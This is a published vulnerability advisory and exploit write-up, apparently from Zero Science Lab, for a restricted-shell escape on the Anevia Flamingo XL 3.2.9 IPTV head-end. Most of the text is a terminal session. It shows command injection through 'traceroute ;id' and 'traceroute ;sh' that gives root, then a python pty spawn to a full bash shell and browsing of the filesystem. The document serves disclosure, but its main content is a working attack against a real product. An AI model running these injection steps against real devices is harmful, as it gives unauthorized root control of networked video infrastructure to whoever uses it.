Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php


13.04.2023

--


$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
  bonding
  config
  date
  dns
  enable
  ethconfig
  exit
  exp
  firewall
  help
  hostname
  http
  igmpq
  imp
  ipconfig
  license
  log
  mail
  passwd
  persistent_logs
  ping
  reboot
  reset
  route
  serial
  settings
  sslconfig
  tcpdump
  timezone
  traceroute
  upgrade
  uptime
  version
  vlanconfig

Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
        -F      Set the don't fragment bit
        -I      Use ICMP ECHO instead of UDP datagrams
        -l      Display the ttl value of the returned packet
        -d      Set SO_DEBUG options to socket
        -n      Print hop addresses numerically rather than symbolically
        -r      Bypass the normal routing tables and send directly to a host
        -v      Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos  Set the type-of-service in probe packets to the following value
                (default 0)
        -w wait Set the time (in seconds) to wait for a response to a probe
                (default 3 sec)
        -g      Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x   19 root     root         1024 Oct  3  2022 .
drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..
drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin
drwxrwxrwt    2 root     root           40 Oct  3  2022 cores
drwxr-xr-x   13 root     root        27648 May 22 00:53 dev
drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul
drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc
drwxr-xr-x    3 root     root         1024 Oct  3  2022 home
drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib
lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib
drwx------    2 root     root        12288 Oct 21  2013 lost+found
drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt
drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions
dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc
drwxr-xr-x    4 root     root         1024 Oct 21  2013 root
drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin
drwxr-xr-x   12 root     root            0 Oct  3  2022 sys
drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp
drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr
drwxr-xr-x   14 root     root         1024 Oct 21  2013 var

ls /var/www/admin
_img                           configuration.php              log_securemedia.php            stream_dump.php
_lang                          cores_and_logs_management.php  login.php                      stream_services
_lib                           dataminer_handshake.php        logout.php                     streaming.php
_style                         dvbt.php                       logs.php                       support.php
about.php                      dvbt_scan.php                  main.php                       template
ajax                           export.php                     manager.php                    time.php
alarm.php                      fileprogress.php               network.php                    toto.ts
alarm_view.php                 firewall.php                   pear                           upload_helper.php
authentication.php             get_config                     power.php                      uptime.php
bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php
cam.php                        get_upgrade_error.php          receive_helper.php             version.php
channel.php                    heartbeat.php                  rescrambling                   webradio.php
channel_xl_list.php            include                        rescrambling.php               webtv
check_state                    input.php                      resilience                     webtv.php
class                          js                             resilience.php                 xmltv.php
common                         license.php                    restart_service.php
config_snmp.php                log.php                        set_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall         mail             timezone
config           help             passwd           traceroute
date             hostname         persistent_logs  upgrade
dbg-serial       http             ping             uptime
dbg-set-oem      igmpq            route            version
dbg-updates-log  imp              serial           vlanconfig
dns              ipconfig         settings
ethconfig        license          sslconfig
exp              log              tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]